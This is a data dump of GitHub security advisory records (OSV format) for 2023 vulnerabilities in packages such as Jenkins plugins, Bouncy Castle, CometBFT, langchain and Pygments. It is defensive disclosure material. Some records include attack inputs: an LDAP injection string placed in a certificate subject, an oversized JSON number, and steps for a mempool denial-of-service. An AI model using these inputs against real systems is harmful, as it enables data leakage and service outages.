schema_version
stringclasses
1 value
id
stringlengths
19
19
modified
stringlengths
20
20
published
stringlengths
20
20
withdrawn
stringlengths
20
20
aliases
stringlengths
2
20
summary
stringlengths
20
140
details
stringlengths
56
37.2k
severity
stringlengths
2
92
affected
stringlengths
88
7.07k
references
stringlengths
139
4.72k
database_specific
stringlengths
131
185
1.4.0
GHSA-mx84-frhw-pcg8
2023-07-20T14:02:15Z
2023-07-12T18:30:39Z
null
['CVE-2023-37959']
Jenkins Sumologic Publisher Plugin missing permission check
Jenkins Sumologic Publisher Plugin 2.2.1 and earlier does not perform a permission check in a method implementing form validation. This allows attackers with Overall/Read permission to connect to an attacker-specified URL. Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:sumologic-publisher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37959'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3117'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:54Z', 'nvd_published_at': None}
1.4.0
GHSA-4vrv-93c7-m92j
2023-07-06T21:36:19Z
2023-07-06T19:24:04Z
null
['CVE-2022-24441']
snyk Code Injection vulnerability
The package snyk before 1.1064.0 is vulnerable to Code Injection when analyzing a project. An attacker who can convince a user to scan a malicious project can include commands in a build file such as build.gradle or gradle-wrapper.jar, which will be executed with the privileges of the application. This vulnerability may be triggered when running the the CLI tool directly, or when running a scan with one of the IDE plugins that invoke the Snyk CLI. Successful exploitation of this issue would likely require some level of social engineering - to coerce an untrusted project to be downloaded and analyzed via the Snyk CLI or opened in an IDE where a Snyk IDE plugin is installed and enabled. Additionally, if the IDE has a Trust feature then the target folder must be marked as ‘trusted’ in order to be vulnerable. **NOTE:** This issue is independent of the one reported in [CVE-2022-40764](https://security.snyk.io/vuln/SNYK-JS-SNYK-3037342), and upgrading to a fixed version for this addresses that issue as well. The affected IDE plugins and versions are: - VS Code - Affected: <=1.8.0, Fixed: 1.9.0 - IntelliJ - Affected: <=2.4.47, Fixed: 2.4.48 - Visual Studio - Affected: <=1.1.30, Fixed: 1.1.31 - Eclipse - Affected: <=v20221115.132308, Fixed: All subsequent versions - Language Server - Affected: <=v20221109.114426, Fixed: All subsequent versions
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'snyk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1064.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24441'}, {'type': 'WEB', 'url': 'https://github.com/snyk/snyk-eclipse-plugin/commit/b5a8bce25a359ced75f83a729fc6b2393fc9a495'}, {'type': 'WEB', 'url': 'https://github.com/snyk/snyk-intellij-plugin/commit/56682f4ba6081ce1d95cb980cbfacd3809a826f4'}, {'type': 'WEB', 'url': 'https://github.com/snyk/snyk-ls/commit/b3229f0142f782871aa72d1a7dcf417546d568ed'}, {'type': 'WEB', 'url': 'https://github.com/snyk/snyk-visual-studio-plugin/commit/0b53dbbd4a3153c3ef9aaf797af3b5caad0f731a'}, {'type': 'WEB', 'url': 'https://github.com/snyk/vscode-extension/commit/0db3b4240be0db6a0a5c6d02c0d4231a2c4ba708'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SNYK-3111871'}, {'type': 'WEB', 'url': 'https://www.imperva.com/blog/how-scanning-your-projects-for-security-issues-can-lead-to-remote-code-execution/'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:36:19Z', 'nvd_published_at': '2022-11-30T13:15:00Z'}
1.4.0
GHSA-crqg-jrpj-fc84
2023-07-14T19:41:32Z
2023-07-07T12:30:22Z
null
['CVE-2023-33008']
Apache Johnzon Deserialization of Untrusted Data vulnerability
A malicious attacker can craft up some JSON input that uses large numbers (numbers such as 1e20000000) that Apache Johnzon will deserialize into BigDecimal and maybe use numbers too large which may result in a slow conversion (Denial of service risk). Apache Johnzon 1.2.21 mitigates this by setting a scale limit of 1000 (by default) to the BigDecimal. This issue affects Apache Johnzon through 1.2.20.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.johnzon:johnzon-mapper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.21'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33008'}, {'type': 'WEB', 'url': 'https://github.com/apache/johnzon/commit/34ad9a6b296ae7b4667c3cf0037998e451499ea4'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/johnzon'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/JOHNZON-397'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/qbg14djo95gfpk7o560lr8wcrzfyw43l'}]
{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T18:32:03Z', 'nvd_published_at': None}
1.4.0
GHSA-3rw2-wfc8-wmj5
2023-07-18T19:23:29Z
2023-07-18T19:23:29Z
null
['CVE-2023-37481']
Fides Webserver Vulnerable to SVG Bomb File Uploads
### Impact The Fides webserver is vulnerable to a type of Denial of Service (DoS) attack. Attackers can exploit this vulnerability to upload zip files containing malicious SVG bombs (similar to a billion laughs attack), causing resource exhaustion in Admin UI browser tabs and creating a persistent denial of service of the 'new connector' page (`datastore-connection/new`). This vulnerability affects Fides versions `2.11.0` through `2.15.1`. Exploitation is limited to users with elevated privileges with the `CONNECTOR_TEMPLATE_REGISTER` scope, which includes root users and users with the owner role. ### Patches The vulnerability has been patched in Fides version `2.16.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. ### Workarounds There is no known workaround to remediate this vulnerability without upgrading.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'ethyca-fides'}, 'ecosystem_specific': {'affected_functions': ['fides.api.service.connectors.saas.connector_registry_service.CustomConnectorTemplateLoader.save_template']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.11.0'}, {'fixed': '2.16.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ethyca/fides/security/advisories/GHSA-3rw2-wfc8-wmj5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37481'}, {'type': 'WEB', 'url': 'https://github.com/ethyca/fides/commit/8beaace082b325e693dc7682029a3cb7e6c2b69d'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethyca/fides'}, {'type': 'WEB', 'url': 'https://github.com/ethyca/fides/releases/tag/2.16.0'}]
{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-18T19:23:29Z', 'nvd_published_at': None}
1.4.0
GHSA-wjg8-pxqj-c3c7
2023-07-06T21:48:54Z
2023-07-06T19:24:11Z
null
['CVE-2020-36663']
Artesãos SEOTools Open Redirect vulnerability
A vulnerability, which was classified as problematic, was found in Artesãos SEOTools up to and including version 0.17.1. This affects the function makeTag of the file OpenGraph.php. The manipulation of the argument value leads to open redirect. Upgrading to version 0.17.2 is able to address this issue. The name of the patch is ca27cd0edf917e0bc805227013859b8b5a1f01fb. It is recommended to upgrade the affected component.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'artesaos/seotools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36663'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/pull/201'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/commit/ca27cd0edf917e0bc805227013859b8b5a1f01fb'}, {'type': 'PACKAGE', 'url': 'https://github.com/artesaos/seotools'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/releases/tag/v0.17.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.222231'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.222231'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:48:54Z', 'nvd_published_at': '2023-03-04T07:15:00Z'}
1.4.0
GHSA-w24w-wp77-qffm
2023-07-05T21:34:45Z
2023-07-05T21:34:45Z
null
['CVE-2023-34451']
CometBFT may duplicate transactions in the mempool's data structures
### Impact The mempool maintains two data structures to keep track of outstanding transactions: a list and a map. These two data structures are supposed to be in sync all the time in the sense that the map tracks the index (if any) of the transaction in the list. Unfortunately, it is possible to have them out of sync. When this happens, the list may contain several copies of the same transaction. Because the map tracks a single index, it is then no longer possible to remove all the copies of the transaction from the list. This happens even if the duplicated transaction is later committed in a block. The only way to remove the transaction is by restarting the node. These are the steps to cause the above duplication problem. Everything should happen within one height, that is no `FinalizeBlock` or `BeginBlock` ABCI calls should happen while these steps are reproduced: 1. send transaction tx1 to the target full node via RPC 2. send N more different transactions to the target full node, where N should be higher than the node's configured value for `cache_size` in `config.toml` 3. send transaction tx1 again to the target full node One of the copies of tx1 is now _stuck_ in the mempool's data structures. Effectively causing a memory leak, and having that node gossiping that transaction to its peers forever. The above problem can be repeated on and on until a sizable number of transactions are stuck in the mempool, in order to try to bring down the target node. This problem is present in releases: `v0.37.0`, and `v0.37.1`, as well as in `v0.34.28`, and all previous releases of the CometBFT repo. It will be fixed in releases `v0.34.29` and `v0.37.2`. ### Patches The PR containing the fix is [here](https://github.com/cometbft/cometbft/pull/890). ### Workarounds * Increasing the value of `cache_size` in `config.toml` makes it very difficult to effectively attack a full node. * Not exposing the transaction submission RPC's would mitigate the probability of a successful attack, as the attacker would then have to create a modified (byzantine) full node to be able to perform the attack via p2p. ### References * [PR](https://github.com/tendermint/tendermint/pull/2778) that introduced the map to track transactions in the mempool. * [PR](https://github.com/cometbft/cometbft/pull/890) containing the fix.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cometbft/cometbft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.34.29'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cometbft/cometbft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.37.0'}, {'fixed': '0.37.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/security/advisories/GHSA-w24w-wp77-qffm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34451'}, {'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/pull/890'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/pull/2778'}, {'type': 'PACKAGE', 'url': 'https://github.com/cometbft/cometbft'}]
{'cwe_ids': ['CWE-401'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T21:34:45Z', 'nvd_published_at': None}
1.4.0
GHSA-ghg2-3w9x-9599
2023-07-31T19:02:43Z
2023-07-20T21:30:58Z
null
['CVE-2023-37602']
Alkacon OpenCMS arbitrary file upload vulnerability
An arbitrary file upload vulnerability in the component /workplace#!explorer of Alkacon OpenCMS v15.0 allows attackers to execute arbitrary code via uploading a crafted PNG file.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.opencms:opencms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '15.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37602'}, {'type': 'PACKAGE', 'url': 'https://github.com/alkacon/opencms-core'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/51564'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:22:12Z', 'nvd_published_at': None}
1.4.0
GHSA-cv2j-922j-hr56
2023-07-31T19:02:24Z
2023-07-26T12:30:28Z
null
['CVE-2023-38672']
Float point exception (FPE) in paddlepaddle
FPE in paddle.linalg.matrix_power in PaddlePaddle before 2.5.0. This flaw can cause a runtime crash and a denial of service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'paddlepaddle'}, 'ecosystem_specific': {'affected_functions': ['paddle.linalg.matrix_power']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38672'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/commit/09926af166b060c9a9845c309110d3baa82921fd'}, {'type': 'PACKAGE', 'url': 'https://github.com/PaddlePaddle/Paddle'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/blob/develop/security/advisory/pdsa-2023-004.md'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/paddlepaddle/PYSEC-2023-125.yaml'}]
{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:34:20Z', 'nvd_published_at': None}
1.4.0
GHSA-hr8g-6v94-x4m9
2023-09-05T16:57:42Z
2023-07-05T03:30:23Z
null
['CVE-2023-33201']
Bouncy Castle For Java LDAP injection vulnerability
Bouncy Castle provides the `X509LDAPCertStoreSpi.java` class which can be used in conjunction with the CertPath API for validating certificate paths. Pre-1.73 the implementation did not check the X.500 name of any certificate, subject, or issuer being passed in for LDAP wild cards, meaning the presence of a wild car may lead to Information Disclosure. A potential attack would be to generate a self-signed certificate with a subject name that contains special characters, e.g: `CN=Subject*)(objectclass=`. This will be included into the filter and provides the attacker ability to specify additional attributes in the search query. This can be exploited as a blind LDAP injection: an attacker can enumerate valid attribute values using the boolean blind injection technique. The exploitation depends on the structure of the target LDAP directory, as well as what kind of errors are exposed to the user. Changes to the `X509LDAPCertStoreSpi.java` class add the additional checking of any X.500 name used to correctly escape wild card characters.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk18on'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15to18'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk14'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.49'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk14'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.49'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk15to18'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk18on'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-debug-jdk14'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.49'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-debug-jdk15to18'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-debug-jdk18on'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15on'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.49'}, {'last_affected': '1.70'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk15on'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.49'}, {'last_affected': '1.70'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-debug-jdk15on'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.49'}, {'last_affected': '1.70'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33201'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/commit/ccf93ca736b89250ff4ce079a5aa56f5cbf0ebbd'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/commit/e8c409a8389c815ea3fda5e8b94c92fdfe583bcc'}, {'type': 'WEB', 'url': 'https://bouncycastle.org'}, {'type': 'WEB', 'url': 'https://bouncycastle.org/releasenotes.html#r1rv74'}, {'type': 'PACKAGE', 'url': 'https://github.com/bcgit/bc-java'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/commits/main/prov/src/main/java/org/bouncycastle/jce/provider/X509LDAPCertStoreSpi.java'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/wiki/CVE-2023-33201'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00000.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230824-0008/'}]
{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T15:40:29Z', 'nvd_published_at': None}
1.4.0
GHSA-cqr6-3x3f-9wr3
2023-07-06T22:57:41Z
2023-07-06T19:24:14Z
null
['CVE-2023-30465']
Apache InLong SQL Injection vulnerability
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.5.0. By manipulating the "orderType" parameter and the ordering of the returned content using an SQL injection attack, an attacker can extract the username of the   user with ID 1 from the "user" table, one character at a time.  Users are advised to upgrade to Apache InLong's 1.6.0 or cherry-pick PR #7530 to solve it.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-pojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.6.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.6.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30465'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/issues/7529'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7530'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://inlong.apache.org/zh-CN/download/release-1.6.0/'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/mrh4nr3jrlbj6nxkn4q8hddbfh1pnok0'}]
{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T22:57:41Z', 'nvd_published_at': '2023-04-11T15:15:00Z'}
1.4.0
GHSA-57fc-8q82-gfp3
2023-07-12T21:57:28Z
2023-07-06T15:30:33Z
null
['CVE-2023-36188']
langchain vulnerable to arbitrary code execution
An issue in langchain allows a remote attacker to execute arbitrary code via the PALChain parameter in the Python exec method.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['langchain.chains.PALChain']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.236'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36188'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/5872'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/issues/5872'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/pull/6003'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/pull/8425'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/commit/e294ba475a355feb95003ed8f1a2b99942509a9e'}, {'type': 'PACKAGE', 'url': 'https://github.com/hwchase17/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-109.yaml'}]
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:08:40Z', 'nvd_published_at': None}
1.4.0
GHSA-jx3q-5rgf-vrrr
2023-07-18T17:56:53Z
2023-07-11T15:31:18Z
null
['CVE-2023-37659']
xalpha vulnerable to Remote Code Execution
xalpha v0.11.4 is vulnerable to Remote Command Execution (RCE).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'xalpha'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.4'}, {'fixed': '0.11.9'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37659'}, {'type': 'WEB', 'url': 'https://github.com/refraction-ray/xalpha/issues/175'}, {'type': 'WEB', 'url': 'https://github.com/refraction-ray/xalpha/commit/6dceaa159a1a319d750ade20a4595956876657b6'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/xalpha/PYSEC-2023-116.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/refraction-ray/xalpha'}]
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:46:05Z', 'nvd_published_at': None}
1.4.0
GHSA-wf8m-qr47-xc9m
2023-07-06T21:55:57Z
2023-07-06T19:24:12Z
null
['CVE-2023-28685']
Jenkins AbsInt a³ Plugin XML External Entity Reference vulnerability
Jenkins AbsInt a³ Plugin 1.1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. This allows attackers able to control `Project File (APX)` contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:absint-a3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28685'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-21/#SECURITY-2930'}]
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:55:57Z', 'nvd_published_at': '2023-03-22T06:15:00Z'}
1.4.0
GHSA-87f6-8gr7-pc6h
2023-07-21T20:18:09Z
2023-07-21T20:18:09Z
null
['CVE-2023-37916']
KubePi may leak password hash of any user
### Summary http://kube.pi/kubepi/api/v1/users/search?pageNum=1&&pageSize=10 leak password of any user (including admin). This leads to password crack attack ### PoC https://drive.google.com/file/d/1ksdawJ1vShRJyT3wAgpqVmz-Ls6hMA7M/preview ### Impact - Leaking confidential information. - Can lead to password cracking attacks
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/KubeOperator/kubepi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-87f6-8gr7-pc6h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37916'}, {'type': 'WEB', 'url': 'https://drive.google.com/file/d/1ksdawJ1vShRJyT3wAgpqVmz-Ls6hMA7M/preview'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/KubePi'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/KubePi/releases/tag/v1.6.5'}]
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:18:09Z', 'nvd_published_at': None}
1.4.0
GHSA-mrwq-x4v8-fh7p
2023-07-26T21:31:24Z
2023-07-19T15:30:26Z
null
['CVE-2022-40896']
Pygments vulnerable to ReDoS
A ReDoS issue was discovered in `pygments/lexers/smithy.py` in Pygments until 2.15.0 via SmithyLexer.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Pygments'}, 'ecosystem_specific': {'affected_functions': ['pygments.lexers.templates.SqlJinjaLexer.analyse_text', 'pygments.lexers.smithy.SmithyLexer', 'pygments.lexers.configs.PropertiesLexer']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.15.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-40896'}, {'type': 'WEB', 'url': 'https://github.com/pygments/pygments/commit/97eb3d5ec7c1b3ea4fcf9dee30a2309cf92bd194'}, {'type': 'WEB', 'url': 'https://github.com/pygments/pygments/commit/dd52102c38ebe78cd57748e09f38929fd283ad04'}, {'type': 'WEB', 'url': 'https://github.com/pygments/pygments/commit/fdf182a7af85b1deeeb637ca970d31935e7c9d52'}, {'type': 'PACKAGE', 'url': 'https://github.com/pygments/pygments'}, {'type': 'WEB', 'url': 'https://github.com/pygments/pygments/blob/master/pygments/lexers/smithy.py#L61'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/pygments/PYSEC-2023-117.yaml'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Pygments/'}, {'type': 'WEB', 'url': 'https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages-part-2/'}]
{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-20T11:00:04Z', 'nvd_published_at': None}
1.4.0
GHSA-7q94-qpjr-xpgm
2023-07-12T21:57:21Z
2023-07-06T15:30:33Z
null
['CVE-2023-36189']
langchain SQL Injection vulnerability
SQL injection vulnerability in langchain allows a remote attacker to obtain sensitive information via the SQLDatabaseChain component.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.225'}]}]}]
